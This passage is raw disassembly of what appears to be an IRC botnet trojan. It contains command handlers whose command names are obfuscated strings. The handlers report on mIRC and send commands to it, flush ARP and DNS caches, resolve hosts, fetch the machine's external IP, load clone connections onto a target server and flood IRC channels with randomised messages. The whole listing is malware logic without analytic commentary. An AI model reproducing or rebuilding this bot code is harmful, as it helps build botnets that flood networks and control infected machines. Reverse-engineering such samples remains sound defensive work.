call dword_456F9C ; SendMessageA
push [ebp+arg_C]
lea eax, [ebp+var_18480]
push eax
call sub_42A5E0
lea eax, [ebp+var_174]
push eax
call sub_42A100
add esp, 0Ch
cmp edi, eax
jge short loc_40D09C
lea eax, [ebp+var_18480]
push offset asc_441410 ; ", "
push eax
call sub_42A5E0
pop ecx
pop ecx
loc_40D09C: ; CODE XREF: sub_40A9FE+2689�j
lea eax, [ebp+var_174]
push eax
call sub_42A100
cmp edi, eax
pop ecx
jnz short loc_40D0C0
lea eax, [ebp+var_18480]
push offset dword_43AB8C
push eax
call sub_42A5E0
pop ecx
pop ecx
loc_40D0C0: ; CODE XREF: sub_40A9FE+26AD�j
lea eax, [ebp+var_174]
inc edi
push eax
call sub_42A100
cmp edi, eax
pop ecx
jle loc_40D048
loc_40D0D6: ; CODE XREF: sub_40A9FE+2644�j
lea eax, [ebp+var_18480]
cmp [ebp+arg_18], 0
push eax
lea eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_304]
push eax
lea eax, [ebp+var_2C20]
push eax
lea eax, [ebp+var_314]
push eax
push offset aUr6ne_mot50_ ; "Ur6ne.MOT50."
push offset aSUserIsRunning ; "%s User is running mIRC v %s, Connected"...
jnz short loc_40D11A
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
jmp short loc_40D124
; ---------------------------------------------------------------------------
loc_40D11A: ; CODE XREF: sub_40A9FE+270D�j
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
loc_40D124: ; CODE XREF: sub_40A9FE+271A�j
add esp, 28h
push [ebp+arg_C]
call dword_437048 ; UnmapViewOfFile
push [ebp+arg_68]
call dword_437044 ; CloseHandle
jmp short loc_40D15F
; ---------------------------------------------------------------------------
loc_40D13B: ; CODE XREF: sub_40A9FE+2478�j
cmp [ebp+arg_14], 0
jnz short loc_40D15F
cmp [ebp+arg_18], 0
jnz short loc_40D169
push offset aUr6ne_mot50_ ; "Ur6ne.MOT50."
push offset aSClientNotOpen ; "%s Client not open."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_40D15F: ; CODE XREF: sub_40A9FE+273B�j
; sub_40A9FE+2741�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40D169: ; CODE XREF: sub_40A9FE+2747�j
push offset aUr6ne_mot50_ ; "Ur6ne.MOT50."
push offset aSClientNotOpen ; "%s Client not open."
jmp loc_414744
; ---------------------------------------------------------------------------
loc_40D178: ; CODE XREF: sub_40A9FE+2460�j
push eax
lea eax, [ebp+var_2B80]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
push 2
pop edi
cmp [ebp+arg_4], edi
jle short loc_40D1CF
loc_40D195: ; CODE XREF: sub_40A9FE+27CF�j
mov eax, [ebx+edi*4]
test eax, eax
jz short loc_40D1C9
push eax
lea eax, [ebp+var_1AB90]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_1AB90]
push 104h
push eax
lea eax, [ebp+var_2B80]
push eax
call sub_4299E0
add esp, 18h
loc_40D1C9: ; CODE XREF: sub_40A9FE+279C�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_40D195
loc_40D1CF: ; CODE XREF: sub_40A9FE+2795�j
lea eax, [ebp+var_2B80]
push eax
call sub_426CEB
test eax, eax
pop ecx
lea eax, [ebp+var_2B80]
push eax
push offset aUr6ne_mot50_ ; "Ur6ne.MOT50."
jz short loc_40D1F3
push offset aSCommandSentS ; "%s Command sent: \"%s\""
jmp short loc_40D1F8
; ---------------------------------------------------------------------------
loc_40D1F3: ; CODE XREF: sub_40A9FE+27EC�j
push offset aSClientNotOp_0 ; "%s Client not open or found: \"%s\""
loc_40D1F8: ; CODE XREF: sub_40A9FE+27F3�j
; sub_40A9FE+2941�j ...
cmp [ebp+arg_18], 0
jnz loc_414791
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
jmp loc_41479B
; ---------------------------------------------------------------------------
loc_40D212: ; CODE XREF: sub_40A9FE+2455�j
push dword ptr [ebx]
push offset aQc9zs1zgzff0 ; "Qc9zS1zGZff0"
call edi ; dword_437178
test eax, eax
jnz short loc_40D240
call sub_427EDC
test eax, eax
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov edi, offset aSArpFlushed_ ; "%s ARP flushed."
jnz loc_40B640
mov edi, offset aSFailedToFlush ; "%s Failed to flush ARP."
jmp loc_40B640
; ---------------------------------------------------------------------------
loc_40D240: ; CODE XREF: sub_40A9FE+281F�j
push dword ptr [ebx]
push offset aWpuwr_6yfru ; "WpuWr.6YFRU/"
call edi ; dword_437178
test eax, eax
jnz short loc_40D27F
mov eax, dword_456E14
test eax, eax
jz short loc_40D275
call eax ; dword_456E14
test eax, eax
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jz short loc_40D26B
mov edi, offset aSDnsCacheFlush ; "%s DNS cache flushed."
jmp loc_40B640
; ---------------------------------------------------------------------------
loc_40D26B: ; CODE XREF: sub_40A9FE+2861�j
mov edi, offset aSFailedToFlu_0 ; "%s Failed to flush DNS cache."
jmp loc_40B640
; ---------------------------------------------------------------------------
loc_40D275: ; CODE XREF: sub_40A9FE+2856�j
mov edi, offset aSFailedToLoadD ; "%s Failed to load dnsapi.dll."
jmp loc_40B63B
; ---------------------------------------------------------------------------
loc_40D27F: ; CODE XREF: sub_40A9FE+284D�j
push dword ptr [ebx]
push offset a6x2ka0buubb_ ; "6x2Ka0buUbB."
call edi ; dword_437178
test eax, eax
jnz loc_40D344
mov eax, [ebx+4]
test eax, eax
jnz short loc_40D2CE
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
loc_40D2A1: ; CODE XREF: sub_40A9FE+2A7C�j
; sub_40A9FE+937E�j
cmp [ebp+arg_14], 0
jnz short loc_40D2BD
cmp [ebp+arg_18], 0
loc_40D2AB: ; CODE XREF: sub_40A9FE+4EB3�j
; sub_40A9FE+519C�j
jnz short loc_40D2C7
loc_40D2AD: ; CODE XREF: sub_40A9FE+9275�j
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_40D2BD: ; CODE XREF: sub_40A9FE+28A7�j
; sub_40A9FE+4EAA�j ...
cmp [ebp+arg_18], 0
loc_40D2C1: ; CODE XREF: sub_40A9FE+617F�j
jz loc_414995
loc_40D2C7: ; CODE XREF: sub_40A9FE:loc_40D2AB�j
; sub_40A9FE+6164�j ...
push edi
loc_40D2C8: ; CODE XREF: sub_40A9FE+9171�j
push ebx
jmp loc_414744
; ---------------------------------------------------------------------------
loc_40D2CE: ; CODE XREF: sub_40A9FE+2897�j
push eax
call dword_456F7C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_4C], eax
jz short loc_40D312
push 2
lea eax, [ebp+var_4C]
push 4
push eax
call dword_456ED8 ; gethostbyaddr
test eax, eax
jz short loc_40D330
push dword ptr [eax]
loc_40D2F1: ; CODE XREF: sub_40A9FE+2930�j
push dword ptr [ebx+4]
cmp [ebp+arg_18], 0
push offset aPimgt12pvee_ ; "pImgT12pvEE."
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSSS_ ; "%s %s: %s -> %s."
jnz loc_414988
jmp loc_414957
; ---------------------------------------------------------------------------
loc_40D312: ; CODE XREF: sub_40A9FE+28DD�j
push dword ptr [ebx+4]
call dword_456FD4 ; gethostbyname
test eax, eax
jz short loc_40D330
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
push eax
call dword_456FDC ; inet_ntoa
push eax
jmp short loc_40D2F1
; ---------------------------------------------------------------------------
loc_40D330: ; CODE XREF: sub_40A9FE+28EF�j
; sub_40A9FE+291F�j
push offset aJgyqn0dmzir12z ; "jgYqN0dmziR12zQe40gFoLm.rilJR.uuL/I0"
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSS_1 ; "%s %s"
jmp loc_40D1F8
; ---------------------------------------------------------------------------
loc_40D344: ; CODE XREF: sub_40A9FE+288C�j
push dword ptr [ebx]
push offset a4rmbzFcic21 ; "4RmBz/FCic21"
call edi ; dword_437178
test eax, eax
jnz short loc_40D367
push [ebp+arg_18]
push [ebp+arg_10]
push dword ptr [esi+0Ch]
call sub_41BE01
loc_40D35F: ; CODE XREF: sub_40A9FE+1462�j
; sub_40A9FE+1B6D�j
add esp, 0Ch
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40D367: ; CODE XREF: sub_40A9FE+2951�j
push dword ptr [ebx]
push offset aSc_coSwlk_ ; "SC.Co/swLK/."
call edi ; dword_437178
test eax, eax
jnz loc_40D40C
mov ebx, offset dword_457C40
push offset byte_454A54
push ebx
call edi ; dword_437178
test eax, eax
jz short loc_40D394
push ebx
call sub_41E4C1
test eax, eax
pop ecx
jz short loc_40D3F5
loc_40D394: ; CODE XREF: sub_40A9FE+2989�j
cmp [ebp+arg_14], 0
mov ebx, offset aHm1h_049e4o ; "Hm1H.049e4O/"
mov edi, offset aSObtainingExte ; "%s Obtaining external IP"
jnz short loc_40D3BA
cmp [ebp+arg_18], 0
jnz short loc_40D3C0
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_40D3BA: ; CODE XREF: sub_40A9FE+29A4�j
cmp [ebp+arg_18], 0
jz short loc_40D3CF
loc_40D3C0: ; CODE XREF: sub_40A9FE+29AA�j
push ebx
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 10h
loc_40D3CF: ; CODE XREF: sub_40A9FE+29C0�j
mov ecx, [ebp+arg_10]
call sub_41DB58
mov ecx, [ebp+arg_10]
push eax
call sub_41CF25
mov edi, eax
push 2710h
push edi
call dword_43707C ; WaitForSingleObject
push edi
call dword_437044 ; CloseHandle
loc_40D3F5: ; CODE XREF: sub_40A9FE+2994�j
push 0
push 1
push [ebp+arg_18]
push [ebp+arg_10]
push dword ptr [esi+0Ch]
call sub_41C238
jmp loc_41479B
; ---------------------------------------------------------------------------
loc_40D40C: ; CODE XREF: sub_40A9FE+2974�j
push dword ptr [ebx]
push offset aLees11vpbnf0 ; "LeEs11vPbnf0"
call edi ; dword_437178
test eax, eax
jnz loc_40F05B
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
push dword ptr [ebx+4]
push offset aLbjvg0r_qmb_ ; "lbJVg0r.qMb."
call edi ; dword_437178
test eax, eax
jnz loc_40D51D
xor ecx, ecx
cmp [ebx+4], ecx
jz loc_40E0E1
cmp [ebx+8], ecx
jz loc_40E0E1
cmp [ebx+0Ch], ecx
jz loc_40E0E1
mov eax, [ebx+10h]
cmp eax, ecx
jz loc_40E0E1
push eax
call sub_42A100
cmp eax, 0Fh
pop ecx
jle short loc_40D47F
mov edi, offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
mov ebx, offset aSTooMuchConns_ ; "%s Too Much conns."
jmp loc_40D2A1
; ---------------------------------------------------------------------------
loc_40D47F: ; CODE XREF: sub_40A9FE+2A70�j
cmp dword ptr [ebx+14h], 0
jnz short loc_40D48C
mov dword ptr [ebx+14h], offset byte_454A54
loc_40D48C: ; CODE XREF: sub_40A9FE+2A85�j
push dword ptr [ebx+14h]
push dword ptr [ebx+10h]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
call sub_4266D3
add esp, 10h
cmp [ebp+arg_14], 0
jnz short loc_40D4E9
cmp [ebp+arg_18], 0
jnz short loc_40D4EF
push dword ptr [ebx+10h]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
push offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
push offset aSLoadedOntoSDA ; "%s Loaded Onto: (%s:%d), Amount: (%d)"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_40D4E9: ; CODE XREF: sub_40A9FE+2AB4�j
cmp [ebp+arg_18], 0
jz short loc_40D51D
loc_40D4EF: ; CODE XREF: sub_40A9FE+2ABA�j
push dword ptr [ebx+10h]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+0Ch]
call sub_42A100
pop ecx
push eax
push dword ptr [ebx+8]
push offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
push offset aSLoadedOntoSDA ; "%s Loaded Onto: (%s:%d), Amount: (%d)"
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_40D51D: ; CODE XREF: sub_40A9FE+2A38�j
; sub_40A9FE+2AEF�j
push dword ptr [ebx+4]
push offset aA52n11svyfw0 ; "A52N11SVYFw0"
call edi ; dword_437178
test eax, eax
jnz loc_40D5E8
cmp [ebx+8], eax
jz loc_40D5E8
push 2710h
push eax
lea eax, [ebp+var_5CA40]
push eax
call sub_429760
push 104h
lea eax, [ebp+var_2FAC]
push 0
push eax
call sub_429760
push dword ptr [ebx+8]
lea eax, [ebp+var_2FAC]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 24h
push 3
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_68], eax
jle short loc_40D5C1
loc_40D57F: ; CODE XREF: sub_40A9FE+2BC1�j
mov eax, [ebp+arg_68]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40D5B6
push eax
lea eax, [ebp+var_5CA40]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_5CA40]
push 104h
push eax
lea eax, [ebp+var_2FAC]
push eax
call sub_4299E0
add esp, 18h
loc_40D5B6: ; CODE XREF: sub_40A9FE+2B89�j
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_4]
jl short loc_40D57F
loc_40D5C1: ; CODE XREF: sub_40A9FE+2B7F�j
lea eax, [ebp+var_2FAC]
push eax
lea eax, [ebp+var_1F9B0]
push offset aS_5 ; "%s"
push eax
call sub_429B03
lea eax, [ebp+var_1F9B0]
push eax
call sub_42638E
add esp, 10h
loc_40D5E8: ; CODE XREF: sub_40A9FE+2B2B�j
; sub_40A9FE+2B34�j
push dword ptr [ebx+4]
push offset aHj6vo0jrp9q0 ; "Hj6vo0JRP9Q0"
call edi ; dword_437178
test eax, eax
jnz loc_40D696
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40D696
push eax
lea eax, [ebp+var_5CC0]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_68], eax
jle short loc_40D667
loc_40D625: ; CODE XREF: sub_40A9FE+2C67�j
mov eax, [ebp+arg_68]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40D65C
push eax
lea eax, [ebp+var_E840]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_E840]
push 100h
push eax
lea eax, [ebp+var_5CC0]
push eax
call sub_4299E0
add esp, 18h
loc_40D65C: ; CODE XREF: sub_40A9FE+2C2F�j
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_4]
jl short loc_40D625
loc_40D667: ; CODE XREF: sub_40A9FE+2C25�j
lea eax, [ebp+var_5CC0]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
loc_40D696: ; CODE XREF: sub_40A9FE+2BF6�j
; sub_40A9FE+2C01�j
push dword ptr [ebx+4]
push offset aR7wrsQhek_0 ; "r7WRs/qHek.0"
call edi ; dword_437178
test eax, eax
jnz loc_40DC31
cmp [ebx+8], eax
jz loc_40DC31
call sub_429B9C
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz1234567890abc"...
cdq
pop ecx
lea edi, [ebp+var_768]
idiv ecx
push 0Fh
pop ecx
rep movsd
movsw
movsb
add dl, 41h
mov byte ptr [ebp+arg_68+3], dl
call sub_429B9C
push 0Fh
pop esi
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
movsx eax, byte ptr [ebp+arg_68+3]
push edx
push eax
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
lea eax, [ebp+var_247D0]
push edx
push offset dword_441180
push eax
call sub_429B03
add esp, 0BCh
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
lea eax, [ebp+var_295F0]
push edx
push offset dword_441158
push eax
call sub_429B03
lea eax, [ebp+var_2E410]
push offset unk_4410C8
push eax
call sub_429B03
lea eax, [ebp+var_247D0]
mov edi, offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push edi
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
lea eax, [ebp+var_295F0]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push edi
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
add esp, 44h
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
lea eax, [ebp+var_2E410]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push edi
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
mov edi, 2710h
lea eax, [ebp+var_2BD00]
push edi
push 0
push eax
call sub_429760
push edi
lea eax, [ebp+var_4DFE0]
push 0
push eax
call sub_429760
add esp, 34h
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov [ebp+arg_68], edx
call sub_429B9C
cdq
idiv esi
mov esi, dword_437188
mov [ebp+var_4], 8Fh
mov [ebp+arg_8], edx
loc_40D9DB: ; CODE XREF: sub_40A9FE+3063�j
call esi ; dword_437188
push eax
call sub_429B8F
cmp [ebp+arg_68], 0Fh
pop ecx
jle short loc_40D9F8
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_68], edx
loc_40D9F8: ; CODE XREF: sub_40A9FE+2FEA�j
cmp [ebp+arg_8], 0Fh
jle short loc_40DA0C
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_8], edx
loc_40DA0C: ; CODE XREF: sub_40A9FE+2FFE�j
call sub_429B9C
push 24h
cdq
pop ecx
idiv ecx
movsx eax, [ebp+edx+var_768]
push eax
lea eax, [ebp+var_2BD00]
push [ebp+arg_8]
push [ebp+arg_68]
push offset dword_4410B4
push edi
push eax
call sub_429BBE
add esp, 18h
lea eax, [ebp+var_2BD00]
push eax
lea eax, [ebp+var_4DFE0]
push eax
call dword_437090 ; lstrcatA
inc [ebp+arg_68]
inc [ebp+arg_8]
call esi ; dword_437188
push eax
call sub_429B8F
dec [ebp+var_4]
pop ecx
jnz loc_40D9DB
lea eax, [ebp+var_4DFE0]
mov esi, offset aSSS ; "%s %s :%s"
push eax
lea eax, [ebp+var_33230]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push esi
push eax
call sub_429B03
lea eax, [ebp+var_33230]
push eax
call sub_42638E
push edi
lea eax, [ebp+var_30B20]
push 0
push eax
call sub_429760
push edi
lea eax, [ebp+var_10F50]
push 0
push eax
call sub_429760
add esp, 30h
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_68], edx
call sub_429B9C
push 0Fh
mov [ebp+var_4], 8Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_8], edx
loc_40DAD8: ; CODE XREF: sub_40A9FE+3168�j
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
cmp [ebp+arg_68], 0Fh
pop ecx
jle short loc_40DAF9
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_68], edx
loc_40DAF9: ; CODE XREF: sub_40A9FE+30EB�j
cmp [ebp+arg_8], 0Fh
jle short loc_40DB0D
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_8], edx
loc_40DB0D: ; CODE XREF: sub_40A9FE+30FF�j
call sub_429B9C
push 24h
cdq
pop ecx
idiv ecx
movsx eax, [ebp+edx+var_768]
push eax
lea eax, [ebp+var_30B20]
push [ebp+arg_8]
push [ebp+arg_68]
push offset dword_4410A4
push edi
push eax
call sub_429BBE
add esp, 18h
lea eax, [ebp+var_30B20]
push eax
lea eax, [ebp+var_10F50]
push eax
call dword_437090 ; lstrcatA
inc [ebp+arg_68]
inc [ebp+arg_8]
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
dec [ebp+var_4]
pop ecx
jnz loc_40DAD8
lea eax, [ebp+var_10F50]
push eax
lea eax, [ebp+var_1D2A0]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push esi
push eax
call sub_429B03
lea eax, [ebp+var_1D2A0]
push eax
call sub_42638E
push edi
lea eax, [ebp+var_1D2A0]
push 0
push eax
call sub_429760
lea eax, [ebp+var_10F50]
push eax
lea eax, [ebp+var_1D2A0]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push esi
push eax
call sub_429B03
lea eax, [ebp+var_1D2A0]
push eax
call sub_42638E
lea eax, [ebp+var_2230]
push eax
call sub_426761
add esp, 40h
lea eax, [ebp+var_2230]
mov esi, offset aSS_1 ; "%s %s"
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_59BC]
push esi
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push esi
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
mov esi, [ebp+arg_C]
mov edi, dword_437178
add esp, 28h
loc_40DC31: ; CODE XREF: sub_40A9FE+2CA4�j
; sub_40A9FE+2CAD�j
push dword ptr [ebx+4]
push offset aDuzcb0kgssv0 ; "DuzCb0KgSsv0"
call edi ; dword_437178
test eax, eax
jnz loc_40DE47
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40DE47
push eax
lea eax, [ebp+var_5FC8]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_68], eax
jle short loc_40DCB0
loc_40DC6E: ; CODE XREF: sub_40A9FE+32B0�j
mov eax, [ebp+arg_68]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40DCA5
push eax
lea eax, [ebp+var_E840]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_E840]
push 100h
push eax
lea eax, [ebp+var_5FC8]
push eax
call sub_4299E0
add esp, 18h
loc_40DCA5: ; CODE XREF: sub_40A9FE+3278�j
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_4]
jl short loc_40DC6E
loc_40DCB0: ; CODE XREF: sub_40A9FE+326E�j
lea eax, [ebp+var_5FC8]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441098
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441088
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441088
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441088
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441074
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441064
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441064
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
loc_40DE47: ; CODE XREF: sub_40A9FE+323F�j
; sub_40A9FE+324A�j
push dword ptr [ebx+4]
push offset aDqjso_47pdb ; "dQJSO.47pdb/"
call edi ; dword_437178
test eax, eax
jnz loc_40DF0E
cmp [ebx+8], eax
jz loc_40DF0E
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441088
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441088
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441088
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
